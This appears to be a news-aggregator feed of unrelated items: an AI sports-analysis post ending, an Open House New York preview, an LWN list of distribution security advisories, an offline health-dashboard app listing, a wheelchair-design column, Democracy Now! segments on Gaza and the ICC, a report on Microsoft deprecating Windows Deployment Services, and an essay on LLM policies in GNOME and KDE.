The same seems useful for sports journalists. If I covered the Big Ten, why wouldn't I have one of these running for every team? Instead of trying to keep a mental model of the whole conference, I'd have an explicit one for each team that was constantly being updated. I could still disagree with it, but at least I'd have something systematic to disagree with.

More broadly, I think this experiment illustrates something interesting about where AI is taking analysis. A lot of sophisticated analysis has historically required either specialized technical expertise or a great deal of manual work. I don't know how to build a serious quantitative model of a college football team, and I don't particularly want to learn. But I do know enough about Illinois football to ask useful questions, decide what matters, challenge assumptions, and judge whether an answer makes sense.

AI changes which parts of that process I have to do myself. It can conduct much of the research, organize the evidence, help construct the analytical framework, make forecasts, monitor indicators, and continuously update the analysis. My job shifts toward deciding whether we're asking the right question, whether the model of the problem makes sense, and where I disagree with its judgments.

You could do the same thing with almost any team or sport. Start with the question you actually care about. Define the plausible futures. Work backward to what would have to be true for each one. Identify the uncertainties that matter enough to forecast. Then keep updating the whole thing as reality unfolds.

Moneyball for people who don't know how to Moneyball

And now I'm curious to try it on other teams. If there's a team you think would make an interesting test case, send it my way and I may build one and share what it finds. Or, if you'd rather try it yourself, sign up for Hinsley and get in touch with me . I'm happy to walk you through how I set mine up and help you build a model for your own team.

I'm still going to read the Illinois message boards, of course. This just gives me a slightly more scientific way to decide when they're wrong.

Go Inside the Bowery's Iconic Graffiti Building at This Year's Open House New York

hellgate
hellgatenyc.com
2026-09-25 09:30:03
Offerings also include a walking tour of the IBX and the new Paradise Theatre in the Bronx. Plus, more news to start your freakin' weekend....
Original Article
Go Inside the Bowery's Iconic Graffiti Building at This Year's Open House New York
(Courtesy of Industrious)

Morning Spew

Offerings also include a walking tour of the IBX and the new Paradise Theatre in the Bronx. Plus, more news to start your freakin' weekend.

Scott's Picks:

Open House New York , the weekend-long festival that invites New Yorkers to kooky, a-couple-times-only events that teach them more about the city, will return in October.

This morning, they are announcing this year's lineup , which includes a walking tour of the Interborough Express , a peek at the second largest theater in New York City behind Radio City Music Hall , design tours of Midtown skyscrapers , and 300 other events you can either buy a ticket to, or join on a drop-in basis between October 16 and 18.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

Security updates for Friday

Linux Weekly News
lwn.net
2026-09-25 09:17:10
Security updates have been issued by AlmaLinux (kernel, kernel-rt, perl-DBI:1.641, and unbound), Debian (jq, libreoffice, openssl, and redis), Fedora (389-ds-base, bcm283x-firmware, cockpit, flatpak-builder, mingw-gdk-pixbuf, openssl3, pcs, rust-cryptoki, squid, uboot-tools, and webkitgtk), Mageia (...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2026:71329 8 kernel 2026-09-24
AlmaLinux ALSA-2026:71213 8 kernel 2026-09-24
AlmaLinux ALSA-2026:71330 8 kernel-rt 2026-09-24
AlmaLinux ALSA-2026:69112 8 perl-DBI:1.641 2026-09-24
AlmaLinux ALSA-2026:71419 10 unbound 2026-09-24
AlmaLinux ALSA-2026:70754 8 unbound 2026-09-24
Debian DSA-6416-2 stable jq 2026-09-25
Debian DSA-6512-1 stable libreoffice 2026-09-24
Debian DLA-4795-1 LTS openssl 2026-09-25
Debian DLA-4794-1 LTS redis 2026-09-24
Fedora FEDORA-2026-0b8bc362b1 F43 389-ds-base 2026-09-25
Fedora FEDORA-2026-b16c9cbc0f F44 389-ds-base 2026-09-25
Fedora FEDORA-2026-c1e25a4642 F45 389-ds-base 2026-09-25
Fedora FEDORA-2026-313e66c007 F45 bcm283x-firmware 2026-09-25
Fedora FEDORA-2026-d375ea9e79 F45 cockpit 2026-09-25
Fedora FEDORA-2026-c450ece4a4 F45 flatpak-builder 2026-09-25
Fedora FEDORA-2026-4e6575b35f F43 mingw-gdk-pixbuf 2026-09-25
Fedora FEDORA-2026-16f1152378 F44 mingw-gdk-pixbuf 2026-09-25
Fedora FEDORA-2026-26573b6029 F45 mingw-gdk-pixbuf 2026-09-25
Fedora FEDORA-2026-9e18ff28a6 F45 openssl3 2026-09-25
Fedora FEDORA-2026-96efddc493 F43 pcs 2026-09-25
Fedora FEDORA-2026-ee77e0c099 F44 pcs 2026-09-25
Fedora FEDORA-2026-c66f1af6a3 F43 rust-cryptoki 2026-09-25
Fedora FEDORA-2026-738ce6f6f8 F44 rust-cryptoki 2026-09-25
Fedora FEDORA-2026-b9e02a8684 F45 rust-cryptoki 2026-09-25
Fedora FEDORA-2026-56c3705788 F44 squid 2026-09-25
Fedora FEDORA-2026-9e8f1c83d0 F45 squid 2026-09-25
Fedora FEDORA-2026-313e66c007 F45 uboot-tools 2026-09-25
Fedora FEDORA-2026-40db9b80a2 F44 webkitgtk 2026-09-25
Mageia MGASA-2026-0447 10 fuse3 2026-09-24
Mageia MGASA-2026-0448 10, 9 perl-Net-DNS 2026-09-24
Mageia MGASA-2026-0450 10, 9 python-gitpython 2026-09-25
Mageia MGASA-2026-0452 10, 9 python-webob 2026-09-25
Mageia MGASA-2026-0449 10, 9 thunderbird, thunderbird-l10n 2026-09-24
Mageia MGASA-2026-0451 10, 9 unbound 2026-09-25
Oracle ELSA-2026-69924 OL8 postgresql:12 2026-09-24
Oracle ELSA-2026-69923 OL8 postgresql:15 2026-09-24
Oracle ELSA-2026-69876 OL8 postgresql:16 2026-09-24
Oracle ELSA-2026-70641 OL9 skopeo 2026-09-24
Slackware SSA:2026-267-01 php 2026-09-24
SUSE SUSE-SU-2026:4334-1 SLE15 oS15.4 ImageMagick 2026-09-24
SUSE SUSE-SU-2026:23865-1 SLE16.0 alloy 2026-09-24
SUSE SUSE-SU-2026:23853-1 SLE16.0 alloy 2026-09-24
SUSE openSUSE-SU-2026:21899-1 oS16.0 alloy 2026-09-24
SUSE openSUSE-SU-2026:21884-1 oS16.0 amazon-ssm-agent 2026-09-24
SUSE openSUSE-SU-2026:21891-1 oS16.0 ant 2026-09-24
SUSE openSUSE-SU-2026:21927-1 oS16.0 apptainer 2026-09-24
SUSE openSUSE-SU-2026:21913-1 oS16.0 chromium 2026-09-24
SUSE openSUSE-SU-2026:21921-1 oS16.0 chromium 2026-09-24
SUSE SUSE-SU-2026:23850-1 SLE16.0 corosync 2026-09-24
SUSE openSUSE-SU-2026:21887-1 oS16.0 corosync 2026-09-24
SUSE openSUSE-SU-2026:21929-1 oS16.0 cyrus-imapd 2026-09-24
SUSE SUSE-SU-2026:23864-1 SLE16.0 distribution 2026-09-24
SUSE SUSE-SU-2026:23852-1 SLE16.0 distribution 2026-09-24
SUSE openSUSE-SU-2026:21898-1 oS16.0 distribution 2026-09-24
SUSE SUSE-SU-2026:23871-1 SLE16.0 exiv2 2026-09-24
SUSE SUSE-SU-2026:23860-1 SLE16.0 exiv2 2026-09-24
SUSE openSUSE-SU-2026:21904-1 oS16.0 exiv2 2026-09-24
SUSE openSUSE-SU-2026:21877-1 oS16.0 ffmpeg-7 2026-09-24
SUSE openSUSE-SU-2026:21883-1 oS16.0 freeipmi 2026-09-24
SUSE openSUSE-SU-2026:21890-1 oS16.0 gdb 2026-09-24
SUSE openSUSE-SU-2026:21888-1 oS16.0 gnome-remote-desktop 2026-09-24
SUSE openSUSE-SU-2026:21882-1 oS16.0 google-osconfig-agent 2026-09-24
SUSE SUSE-SU-2026:23863-1 SLE16.0 govulncheck-vulndb 2026-09-24
SUSE SUSE-SU-2026:23855-1 SLE16.0 govulncheck-vulndb 2026-09-24
SUSE openSUSE-SU-2026:21897-1 oS16.0 govulncheck-vulndb 2026-09-24
SUSE openSUSE-SU-2026:21875-1 oS16.0 gvfs 2026-09-24
SUSE SUSE-SU-2026:4335-1 SLE12 hplip 2026-09-24
SUSE openSUSE-SU-2026:21911-1 oS16.0 imagemagick 2026-09-24
SUSE SUSE-SU-2026:4339-1 SLE15 java-11-openjdk 2026-09-24
SUSE SUSE-SU-2026:23867-1 SLE16.0 jsoup, re2j 2026-09-24
SUSE SUSE-SU-2026:23856-1 SLE16.0 jsoup, re2j 2026-09-24
SUSE SUSE-SU-2026:4347-1 SLE15 SLE5.5 SLE-m5.5 oS15.5 kernel 2026-09-24
SUSE openSUSE-SU-2026:21910-1 SLE16.0 oS16.0 kernel 2026-09-24
SUSE openSUSE-SU-2026:21925-1 oS16.0 keybase-client 2026-09-24
SUSE SUSE-SU-2026:23866-1 SLE16.0 libsoup 2026-09-24
SUSE SUSE-SU-2026:23857-1 SLE16.0 libsoup 2026-09-24
SUSE openSUSE-SU-2026:21871-1 oS16.0 libsoup 2026-09-24
SUSE openSUSE-SU-2026:21901-1 oS16.0 libsoup 2026-09-24
SUSE openSUSE-SU-2026:21908-1 oS16.0 libx11 2026-09-24
SUSE openSUSE-SU-2026:21909-1 oS16.0 libxrender 2026-09-24
SUSE openSUSE-SU-2026:21886-1 oS16.0 mcphost 2026-09-24
SUSE openSUSE-SU-2026:21872-1 oS16.0 memcached 2026-09-24
SUSE openSUSE-SU-2026:21873-1 oS16.0 opensc 2026-09-24
SUSE SUSE-SU-2026:4346-1 SLE12 perl-DBI 2026-09-24
SUSE openSUSE-SU-2026:21874-1 oS16.0 python-gitpython 2026-09-24
SUSE openSUSE-SU-2026:21928-1 oS16.0 python-weasyprint 2026-09-24
SUSE SUSE-SU-2026:23869-1 SLE16.0 rabbitmq-server 2026-09-24
SUSE SUSE-SU-2026:23859-1 SLE16.0 rabbitmq-server 2026-09-24
SUSE openSUSE-SU-2026:21903-1 oS16.0 rabbitmq-server 2026-09-24
SUSE openSUSE-SU-2026:21878-1 oS16.0 ruby3.4 2026-09-24
SUSE SUSE-SU-2026:23870-1 SLE16.0 util-linux 2026-09-24
SUSE SUSE-SU-2026:23861-1 SLE16.0 util-linux 2026-09-24
SUSE openSUSE-SU-2026:21905-1 oS16.0 util-linux 2026-09-24
SUSE SUSE-SU-2026:23868-1 SLE16.0 zstd-jni 2026-09-24
SUSE SUSE-SU-2026:23858-1 SLE16.0 zstd-jni 2026-09-24
SUSE openSUSE-SU-2026:21902-1 oS16.0 zstd-jni 2026-09-24
Ubuntu USN-8820-1 16.04 18.04 20.04 22.04 24.04 26.04 curl 2026-09-24
Ubuntu USN-8813-1 14.04 16.04 18.04 20.04 22.04 24.04 26.04 expat 2026-09-24
Ubuntu USN-8812-1 14.04 16.04 18.04 20.04 22.04 24.04 26.04 gdal 2026-09-24
Ubuntu USN-8815-1 14.04 18.04 20.04 24.04 26.04 libass 2026-09-24
Ubuntu USN-8824-1 14.04 16.04 18.04 20.04 22.04 24.04 26.04 libpcap 2026-09-25
Ubuntu USN-8816-1 24.04 26.04 linux, linux-aws, linux-aws-7.0, linux-hwe-7.0, linux-ibm, linux-oracle, linux-raspi, linux-realtime 2026-09-24
Ubuntu USN-8817-1 22.04 24.04 linux, linux-azure, linux-azure-6.8, linux-azure-fde, linux-azure-fde-6.8, linux-azure-fips, linux-fips, linux-gcp, linux-gcp-6.8, linux-gcp-fips, linux-gke, linux-gkeop, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux-raspi-realtime, linux-realtime, linux-realtime-6.8 2026-09-24
Ubuntu USN-8819-1 16.04 18.04 linux, linux-hwe, linux-kvm 2026-09-25
Ubuntu USN-8818-1 20.04 22.04 linux-aws, linux-aws-fips, linux-azure, linux-azure-fde, linux-azure-fips, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-intel-iot-realtime, linux-intel-iotg, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oracle, linux-realtime, linux-xilinx-zynqmp 2026-09-24
Ubuntu USN-8819-2 16.04 18.04 linux-aws, linux-gcp, linux-gcp-4.15, linux-gcp-fips 2026-09-25
Ubuntu USN-8729-5 24.04 linux-aws-fips 2026-09-25
Ubuntu USN-8818-2 20.04 linux-ibm-5.15 2026-09-25
Ubuntu USN-8730-6 20.04 linux-intel-iotg-5.15 2026-09-25
Ubuntu USN-8814-1 22.04 24.04 26.04 octavia 2026-09-24
Ubuntu USN-8821-1 26.04 swift 2026-09-24

Show HN: Hamilton – a no-internet Android health dashboard, named after my dog

Hacker News
play.google.com
2026-09-25 08:49:17
Comments...
Original Article

Hamilton fetches all your health metrics from Health Connect and puts them in one place — no account, no internet, no data leaving your phone. Ever.

Named after my dog (a very good boy), Hamilton solves a simple problem: if you own a Garmin watch AND a Withings scale AND maybe a Fitbit or Samsung device, your health data is scattered across half a dozen apps. Hamilton brings it all together into one clean dashboard.

YOUR DATA STAYS ON YOUR PHONE

Hamilton has no internet permission. Not "we promise not to send your data" — it literally cannot connect to the internet. No analytics, no tracking, no cloud sync, no account. Open the app, see your numbers, done.

Check for yourself: Hamilton requests zero network permissions. The permission list on this page is the proof. Your privacy policy is built into the app too — readable offline, because there's nothing to fetch.

WHAT HAMILTON DOES

Hamilton reads from Android Health Connect, so it works with any device or app that writes there — Garmin, Withings, Fitbit, Samsung Health, Oura, Whoop, Google Fit, Strava and many more.

Metrics at a glance:
• Steps, distance, active calories and total calories
• Weight, body fat, lean mass, body water and bone mass
• Heart rate, resting heart rate and heart rate variability (HRV)
• Sleep duration and sleep stages
• Blood oxygen (SpO2), breathing rate and skin temperature
• Floors climbed, hydration, nutrition and mindfulness minutes

BUILT FOR PEOPLE WITH MULTIPLE DEVICES

If your phone and your watch both count steps, most dashboards add them together and tell you you walked 19,000 steps. Hamilton doesn't. It picks your best single source for each day, so your totals are never double-counted.

Switched watches? Your history stays continuous — Hamilton stitches your old device's data to your new one. Or pin any metric to the app you trust most and it will only use that one.

If you've ever opened Garmin Connect to check your steps, switched to Withings for your weight, then opened a third app for nutrition — Hamilton replaces all three trips with one glance. It doesn't replace those apps; they keep syncing to Health Connect as usual. Hamilton just reads what's already there.

FEATURES

• Home dashboard with live tiles and 7-day sparklines
• Trends — chart any metric over days, weeks or months
• Overlay a second metric, and offset it by a number of days to spot lagging correlations
• History for daily breakdowns, each reading with its source
• Sleep stage breakdowns, night by night
• Nutrition macros — protein, carbs, fat, fibre and sugar
• Body composition — weight as lean vs fat mass
• Optional background refresh — Hamilton can fetch while closed so your dashboard is current when you open it. Off by default, and it posts a notification each time it runs. Still no internet: it only reads Health Connect, on your phone.
• Metric toggles, data source picker, pull to refresh, dark and light modes

PAY ONCE, OWN IT FOREVER

One payment. No subscription, no trial that expires, no losing your dashboard if you stop paying.

THE HONEST BIT

Hamilton is read-only — it never writes to or modifies your Health Connect data. And it can only show what's in Health Connect: if your device or app doesn't sync there, Hamilton can't see it. It's a private viewer, not a cloud aggregator. That's the point.

Requires Health Connect.

A NOTE FROM HAMILTON THE DOG

Woof. I don't understand what any of these numbers mean, but my human seems very excited about them. I mainly contributed by sitting on his lap while he coded this and making him get his steps in. You're welcome.

This app is not a medical device and does not diagnose, treat or prevent any condition.

Nobody Asked for a Crab Chair

Hacker News
newmobility.com
2026-09-25 08:48:00
Comments...
Original Article
Toyota prototype chair with light-up legs that bend and move independently

In our last installment of “Good Intentions Gone Wrong: When Disability Engineers Go Bad,” we highlighted a particularly egregious Swiss wheelchair design featuring superfluous drones . Thankfully, not all engineers who receive blank checks to design disability solutions are that out of touch. More commonly, the lack of constraints that comes with deep corporate pockets results in sexy, future-forward designs with tantalizing possibilities that somehow leave me feeling more empty than excited.

Toyota’s new-ish “Walk me” prototype could be the poster chair for what I’m talking about. The “Walk me” replaces wheels with four articulating legs that bend and move independently. Picture a four-legged crab with light-up legs carefully balancing an uncomfortable-looking seat.

Using LiDAR, collision radars, and internal weight sensors, the crabchair can transport its user over uneven terrain or up and down stairs. With an aesthetically-pleasing pastel color palette and a chic, future-minimalist vibe, it’s easy to see why the crabchair was a hit when Toyota unveiled it last fall at the Japan Mobility Show.

Let’s be clear: if I could have a free crabchair tomorrow, I’d be out the door, in the line to pick up my new robot legs before I knew where to go.

But these kinds of prototypes are built to inspire and show what is possible, not to be mass produced for actual users. In short, don’t get your hopes up you’ll ever see a crabchair clawing its way down the street.

They’re over-designed, cost prohibitive and generally out of touch with the realities facing most would-be users. They’re engineering inspiration porn. They make headlines (yes, I’m guilty), and make people feel like they’re helping an underserved community and making the world a better place. Unfortunately, they very rarely translate into real world benefits for people like us.

That alone would be disappointing, but probably closer to a “no harm, no foul” situation: rich people and companies building expensive toys and patting themselves on the back. It has been going on forever and likely will into the future.

My concern, and the thing that saps any enthusiasm the sleek design might inspire in me, is that much like more traditional inspiration porn harms the disabled community by propagating false narratives and not doing justice to real experiences of disabled people, this engineering version of inspiration porn neglects to address the design problems most critical to our community while pulling away obviously-talented designers and chair-loads of cash that could have been focused on solving them.

These kinds of prototypes are built to inspire and show what is possible, not to be mass produced for actual users.

I would give at least a few of my quad fingers for a high quality, lightweight, low-profile indoor/outdoor power chair with the customizable seating and back options I rely on. Same for a stable shower chair that could safely navigate step-in showers. I’m not talking about reinventing the wheel(chair), but tweaking and refining the designs we have to optimize independence and function for users.

Like I wrote in the previous article in this series, there are brilliant designers working on these and other similar issues but we need more! More minds, more money, more eyeballs focused on improving what we have and doing so in affordable ways.

I genuinely appreciate the designers behind the “Walk me” (even if I wholeheartedly question whomever decided the name should sound like wheelchair users are the crabchair’s pets). I hope their experience designing the crabchair got them excited about disability-related design and that they continue to pursue it.

All I ask is that instead of sitting in their corporate labs, bouncing ideas off each other, they get out into the real world. They should dedicate themselves to engaging and listening to the disability community about what problems need solving and what does and doesn’t work. We know. We get it.

Lord knows we don’t need any more designs like this …


Support New Mobility

Wait! Before you wander off to other parts of the internet, please consider supporting New Mobility. For more than three decades, New Mobility has published groundbreaking content for active wheelchair users. We share practical advice from wheelchair users across the country, review life-changing technology and demand equity in healthcare, travel and all facets of life. But none of this is cheap, easy or profitable. Your support helps us give wheelchair users the resources to build a fulfilling life.

"Crossing the Red Line": Akbar Shahid Ahmed on Biden, His Advisers, Harris & Israel's War in Gaza

Democracy Now!
www.democracynow.org
2026-09-25 08:44:51
We speak with journalist Akbar Shahid Ahmed, whose new book, Crossing the Red Line, looks at how President Joe Biden and top figures in his administration supported Israel’s brutal war in Gaza despite the soaring death toll and growing alarm over widespread war crimes committed by the Israeli ...
Original Article

Hi there,

Freedom of the press and our democracy are at greater risk than ever. Democracy Now! continues to spotlight the voices of groups and individuals striving to protect our first amendment rights and to keep our democracy intact. Please donate today, so we can keep you informed with the news that matters most as we navigate this unprecedented period.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

We speak with journalist Akbar Shahid Ahmed, whose new book, Crossing the Red Line , looks at how President Joe Biden and top figures in his administration supported Israel’s brutal war in Gaza despite the soaring death toll and growing alarm over widespread war crimes committed by the Israeli military.

“The policies that we’ve seen entrenched and, frankly, worsened and become more dangerous and deadly under Donald Trump were really established by Biden’s team,” says Ahmed, who says there is “bipartisan continuity” on Israel-Palestine between the two presidents.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

Microsoft plans to deprecate Windows Deployment Services

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 08:40:59
Microsoft announced it will deprecate the Windows Deployment Services (WDS) server role starting with the next Windows Server release. [...]...
Original Article

Windows Server

Microsoft announced it will deprecate the Windows Deployment Services (WDS) server role starting with the next Windows Server release.

WDS is a revised version of Remote Installation Services (RIS) that lets IT administrators remotely install Windows operating systems on fleets of dozens or hundreds of computers over a network.

After deprecating WDS in the next Windows Server version, Microsoft will stop active development and plans to retire and remove it completely.

The company partially deprecated WDS, removing boot.wim support in 2021 and hands-free deployment in January 2026 (this is now disabled by default for all customers who installed the April 2026 Windows updates or any subsequent ones).

After those changes, it stopped officially supporting the deployment of standard desktop operating systems using its native setup engine starting with Windows 11, and Microsoft restricted WDS to deploying Windows Server or booting custom deployment environments.

"This includes the inbox WDS role, WDS services, management tools and interfaces, and WDS-provided Preboot Execution Environment (PXE) boot functionality," Microsoft said .

"Deprecated products are supported until they are eventually removed from a future OS version," it added in an early notice published earlier this week.

"While deprecated, WDS will continue to work on all currently supported Windows Server versions according to their published servicing lifecycles. This announcement does not change WDS availability or support on those releases."

However, Microsoft noted that the inbox WDS server role and associated WDS functionality remain available on all currently supported Windows Server releases (Windows Server 2025 and earlier), and that non-Microsoft deployment products and independent PXE implementations that don't depend on WDS are not affected.

"Microsoft Configuration Manager operating system deployment is not being affected," it said. "However, begin migrating Configuration Manager environments that still use WDS-backed PXE or WDS-dependent multicast away from those WDS dependencies."

Microsoft advised customers to begin planning their migration to alternatives like Microsoft Configuration Manager , which provides a more flexible experience for deploying Windows images.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

The Hague Group: South Africa Leads Coalition Against U.S./Israel's "Unilateral Bullying" of the ICC

Democracy Now!
www.democracynow.org
2026-09-25 08:32:41
At the United Nations this week, President Trump repeated his attacks on the International Criminal Court and urged other nations to pull out of the global tribunal. The United States earlier this year imposed sanctions on the president of the ICC and a senior prosecutor who was part of the team tha...
Original Article

At the United Nations this week, President Trump repeated his attacks on the International Criminal Court and urged other nations to pull out of the global tribunal. The United States earlier this year imposed sanctions on the president of the ICC and a senior prosecutor who was part of the team that issued an arrest warrant for Israeli Prime Minister Benjamin Netanyahu for crimes against humanity in Gaza, and the Trump administration is reportedly preparing more sanctions against the institution itself. Meanwhile, a coalition of nations has formed to defend international law in solidarity with the people of Palestine under the banner of the Hague Group, which was established last year by Bolivia, Colombia, Cuba, Honduras, Malaysia, Namibia, Senegal and South Africa.

“It’s an absolute low point for the sacred grounds of the United Nations that President Trump has shown up here and attacked the international legal order,” says Varsha Gandikota, executive secretary of the Hague Group.

We also air remarks from South African Foreign Minister Ronald Lamola, who spoke earlier this week at the historic Riverside Church in New York City to urge respect for international law.



Guests
  • Varsha Gandikota

    executive secretary of The Hague Group and co-general coordinator of Progressive International.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

LLM Policies: Progress At All Costs

Lobsters
diegoe.be
2026-09-25 08:30:36
Comments...
Original Article

GNOME and KDE have started to consider LLM policies, and we should talk about what this is really about.

KDE caught everyone's attention first by igniting a flame war with an LLM-friendly draft that ended up being deleted, causing a few bans, and having a bunch of people go full "Some of you may die, but that is a sacrifice I am willing to make" . GNOME has not proposed anything official, but some teams ( gnome-calendar , loupe , libadwaita , gnome-software , Circle , among others) already have strong policies in place, and there is now an informal draft to ban all LLM contributions to GNOME projects and infrastructure .

However I believe these discussions are not about nitpicking workflows but rather about the raison d'être , the reason to be, of FLOSS projects.

Communities Or Completionism

My take is that there are currently two ways of thinking about why FLOSS exists, or should exist. So far, both sides have coexisted but the growing acceptance of LLMs into some developer workflows has disrupted the balance.

We can call one of these sides "collectivism". This frames FLOSS to be about accomplishing things together, enjoying the journey and bonds that big goals tend to create. The fun is the collective effort and challenge. Overcoming language and social barriers is part of the reward. "The journey is the destination", "FLOSS is the friends we made along the way", etc.

On the other side there is "completionism", where FLOSS is "just a product" and its only goal is to always be better, faster, safer. Any fun to be had is in individually solving technical problems and requirements. Social bonds may happen, but colleagues are more coworkers than community. This is a "100% allglitches alltricks" TAS speedrun. The "we are apolitical", "we only care about the code" view.

My assessment is that the collectivist framing finds FLOSS primarily a social exercise that rewards you with experiences, bonds, and ideas outside of your niche interests. Some times you even get good software as a bonus! The second framing sees FLOSS as a tool to scale the complexity of your individual computer interest, like graphics or security. FLOSS is a convenience compared to manually rebasing patches and forks all the time.

The problem we are facing is that LLMs have given the second group a lever to stop giving the collectivist framing any room. When the LLM can get you 80% of the way to your goal, there is no need to "waste" time in mentoring, discussion, or convincing others. The temptation compounds if you are considered an expert in your field. You can surely fill in the last 20%, right? Is anyone going to challenge not only the machine, but also the expert?

Progress At All Costs

Since LLMs present themselves as neutral, and dispassionate, opposition to their output becomes opposition to objective progress: bug fixes, security hypotheticals, features. Progress is whatever the LLM, under my own careful eyes, says it is. Interactions with others become formalities, since the LLM is simply boosting my own, already expert and close to infallible, output. Right?

Unfortunately this "expert slop", where expert is a self-perceived title, carries a corporate framing that damages interactions. Others become, at best, fungible coworkers, and, at worst, annoying speed bumps in the race to 100% completion of any software interest the expert has. No more mentoring, debating, flame wars. "Progress" is the only goal. The line must go up.

There is more to say about how this machiavellian framing causes far more important harms and externalities, in the name of LLMs themselves, or apparent LLM-assisted progress. Think of any group and you will find out they have been handed part of the bill for these externalities:

These are the real costs in the "Progress At All Costs" that LLMs bring into FLOSS. These are the people who will pay the bill, behind the scenes and far from our screens, so that some big brain engineers can avoid reading documentation, writing boilerplate, learning unfamiliar code, or, worse, working with others.

FLOSS As Principled Software

Almost ten years ago Allan Day described GNOME as Principled Software because of its commitment to always doing the right thing, in code or design, because it was the right thing and not because of ease, pressure, or hype. I believe this is why so many other FLOSS projects have always looked at GNOME for guidance on what good FLOSS should be. This discussion is just another opportunity to continue to meet this expectation.

Recent discussions have shared similar sentiments like reminding us that we do book clubs because we want to read and enjoy books , not to just discuss over summaries because it is "more productive". That when pressed to accelerate FLOSS, to make the line go up, we have to ask for whom do we want to be more productive, efficient, faster? . And that every decision is political and affect other people around you .

We already know that LLM productivity is not real, just a self perception , that LLMs are just a fairy tale to maintain tech stocks hypergrowth, by farming engineers for engagement , and the latest in a series of attacks to commoditize tech workers. Knowing all this, are we still going to play along with big tech's lies and exploitation? Or, are we going to make another principled stand?

GNOME did not need LLMs to produce 30 years of creative engineering, design, localization, inclusion, and collaboration that has been shared with people around the world. It does not need to throw away this incredible legacy simply because LLMs happen to farm our worst individualist impulses.

We came this far without compromising our principles, let's not start now.

"Grotesque": Ex-Israeli Negotiator Daniel Levy on Netanyahu's U.N. Speech & Israel's Impunity

Democracy Now!
www.democracynow.org
2026-09-25 08:18:23
Israeli Prime Minister Benjamin Netanyahu addressed a half-empty chamber at the United Nations General Assembly on Thursday, after dozens of delegations walked out in protest at the start of his speech. Netanyahu assailed his critics as “antisemites,” defended his country’s conduct...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now! , democracynow.org. I’m Amy Goodman. We are broadcasting from London.

As the protest took place outside the United Nations, Israeli Prime Minister Benjamin Netanyahu delivered a defiant speech to a half-empty chamber at the United Nations General Assembly Thursday, after dozens of delegations walked out in protest at the start of his address.

Netanyahu assailed his critics as antisemites and lavished praise on President Trump for joining Israel’s strikes on Iran.

PRIME MINISTER BENJAMIN NETANYAHU : In this battle against the barbarians, we’ve had no greater partner than President Trump. I thank him. I thank him for his bold leadership. He boldly confronted an enormous danger to America, Israel and the world.

AMY GOODMAN : In his speech, Israeli Prime Minister Benjamin Netanyahu also lashed out at his critics, including New York City Mayor Zohran Mamdani.

PRIME MINISTER BENJAMIN NETANYAHU : Mr. Mamdani, you tried to stop me from coming here. You tried — you tried to silence me. Well, you can’t silence me. You can’t silence the truth. And here’s the simple truth — here’s the simple truth: Israel didn’t commit genocide; Israel prevented genocide. And that’s exactly — that’s exactly what Mr. Mamdani’s Hamas buddies would have done to us, had we not stopped them. They would have killed every last one of us.

AMY GOODMAN : For more, we go now to the United Nations, where we’re joined by Daniel Levy, president of the U.S./Middle East Project, a former Israeli peace negotiator under Israeli Prime Ministers Ehud Barak and Yitzhak Rabin.

Welcome to Democracy Now! It’s strange, Daniel, for you to be in New York and for me to be in London, where you usually are. But if you can start off by, overall, responding to Netanyahu’s address?

DANIEL LEVY : Well, this was the grotesque figure that we have become familiar with on the international stage, and we saw that in all its appalling lack of profundity yesterday here on this stage. I would say, Amy, that we understandably focus on the person of Netanyahu, but this goes so much deeper. We may not have him on the stage next year — we’ll see what happens in the Israeli elections — but the sad truth is it’s not just about Netanyahu, that human rights for Palestinians, that a change in approach in policy, that ending genocide, apartheid and occupation are not on the ballot in Israel’s election. No Zionist party is standing on a fundamentally different platform.

And perhaps it’s easy to understand why, when Netanyahu can get away with this, when Israel is treated with impunity, where you have — look, you had more leaders here talking in quite a strong way about their opposition to what Israel is doing, but that needs to be translated into action, if we’re going to see change.

There’s a meeting today here that I will be joining of the Hague Group, led by South Africa, to hold Israel accountable, to have an arms embargo so Israel can’t continue these crimes, to stop complicity of states in Israel’s illegal occupation, illegal settlements. But unless you see those measures, I don’t think we’re going to see change.

And, of course, it’s unsurprising that Netanyahu should offer the kinds of words he did, when just a couple of days previously the president of the United States stood there and talked about annihilating Iran, and when elsewhere in the building you’ve had equally grotesque presentations by Kushner, Blair, the guy they’ve appointed as governor of Gaza, Mladenov, who have been offering us these slideshows of how you’re going to privatize construction projects in Gaza, when the daily suffering, killing, prevention of desperately needed supplies for Palestinians, the continued occupation of Israel there, that’s all ongoing.

So, what I’m saying is, yes, the grotesque person of Netanyahu, but let’s also understand why he can get away with it. It’s the impunity that so many are complicit in.

AMY GOODMAN : In his speech in the United Nations General Assembly, Netanyahu downplayed violent settlers in the West Bank as “young juvenile delinquents.” This is what he said.

